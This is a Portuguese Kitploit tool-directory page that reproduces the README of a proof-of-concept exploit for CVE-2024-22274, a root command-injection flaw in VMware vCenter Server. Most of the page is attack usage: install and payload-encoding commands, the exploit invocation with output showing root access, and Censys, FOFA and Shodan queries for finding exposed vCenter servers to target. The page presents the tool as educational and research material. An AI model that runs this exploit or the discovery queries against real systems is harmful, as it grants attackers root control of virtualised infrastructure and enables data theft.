Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-22274-RCE — PoC - Execução Remota de Código Autenticada no VMware vCenter Server (Exploit) | Kitploit
Ferramentas/GitHubGitHub/l0n3m4n/cve-2024-22274-rce
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
GitHubl0n3m4n/cve-2024-22274-rce

CVE-2024-22274-RCE

PoC - Execução Remota de Código Autenticada no VMware vCenter Server (Exploit)

Ver Repositório
45647há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Escalonamento de Privilégios: RCE Autenticado no VMware vCenter Server

Facebook X Medium Python Kali

📜 Descrição

Os componentes “com.vmware.appliance.recovery.backup.job.create” e “com.vmware.appliance.recovery.backup.validate” da API são vulneráveis a um ataque de injeção de flag que pode ser usado para executar comandos arbitrários como usuário root no sistema alvo."

📚 Sumário

  • 📜 Descrição
  • 🛠️ Instalação
  • ⚙️ Uso
  • 🔎 Descoberta
  • 📝 Notas
  • 💁 Referências
  • 📢 Aviso Legal

🛠️ Instalação e Configuração

[!NOTE] Para trabalhar com este PoC de exploit, você deve ter credenciais válidas e fazer login no shell do VMware vCenter Server via SSH. O usuário deve ter o papel "admin", conforme especificado no arquivo vcenter_creds.txt.

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 

Execute ou modifique user2base64.sh para codificar o novo usuário adicionado em base64 e ele criará automaticamente payload.txt

root@kitploit:~

$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt                                 

⚙️ Uso

VMware-vCenter

Versão Vulnerável

vulnerable-version

Execução e Exploração Bem-sucedidas

root@kitploit:~
$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103

Execução Bem-sucedida sem Acesso Root

Este exemplo significa que você está se conectando, mas o payload não foi configurado ou carregado corretamente. Consulte o PDF PoC para obter informações mais detalhadas.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   No privileges escalation detected.

[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103

Nome de Usuário ou Senha Ausentes no Arquivo de Configuração

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: Username or password not found in configuration file.

Falha de Conexão ou Erro de SSH

Verifique o endereço do host e as credenciais.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.

🔎 Descoberta

  • CENSYS: "VMware vCenter", Filtro: services.port: 443 AND tags: "VMware"
  • FOFA: title="VMware vCenter", Filtro: port="443" && title="VMware vCenter"
  • SHODAN: "VMware vCenter", Filtro: port:443 "VMware vCenter"

📝 Notas

Este PoC de exploit não será eficaz se você não entender como interpretar o script, pois ele foi intencionalmente alterado para impedir que "script kiddies" simplesmente o copiem e executem sem compreensão. O VMware vCenter Server é um componente crítico no gerenciamento de ambientes virtualizados; se alguém obtiver acesso a ele, poderá obter controle total sobre a infraestrutura virtual e exfiltrar dados sensíveis. Este PoC foi projetado para aqueles que já possuem um pequeno conhecimento técnico para usá-lo corretamente; portanto, se você é um script kiddie que busca causar perturbação sem entender as implicações, este exploit não será útil para você.

💁 Referências

  • http://www.vmware.com/security/advisories
  • https://nvd.nist.gov/vuln/detail/CVE-2024-22274
  • https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202405-4049
  • https://bdu.fstec.ru/vul/2024-05108
  • https://github.com/advisories/GHSA-xm44-79f8-q8r7

📢 Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado pela ferramenta. criar issue

Baixar ferramenta